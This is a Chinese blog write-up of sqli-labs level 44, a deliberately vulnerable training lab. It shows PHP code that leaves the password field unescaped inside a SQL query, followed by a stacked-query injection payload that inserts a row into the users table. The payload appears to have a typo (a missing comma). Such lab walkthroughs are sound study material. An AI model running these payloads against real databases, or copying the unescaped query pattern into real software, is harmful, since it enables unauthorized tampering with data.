zoukankan      html  css  js  c++  java
  • sqli-labs(44)

    第四十四关

    本关是基于盲注的,这里盲注主要是要没有报错信息,所以要采用盲注。这关与42关的区别就在于没有报错信息

    过滤点:
    
       $username = mysqli_real_escape_string($con1, $_POST["login_user"]);
       $password = $_POST["login_password"];
    
    sql语句:
    
      $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
    
    复制代码

    那么这不是 直接构造payload吗?

    随意输入用户名,密码如下:
    
    paload:
    a';insert into users values(107,'aaa''aaa')#
  • 相关阅读:
    forget word out4
    forget word out2
    forget words out1
    en_o out1
    en_e outtest2
    en_e out1
    疑难en_a
    en_a
    entest1
    铺音out2
  • 原文地址:https://www.cnblogs.com/-zhong/p/10965268.html
Copyright © 2011-2022 走看看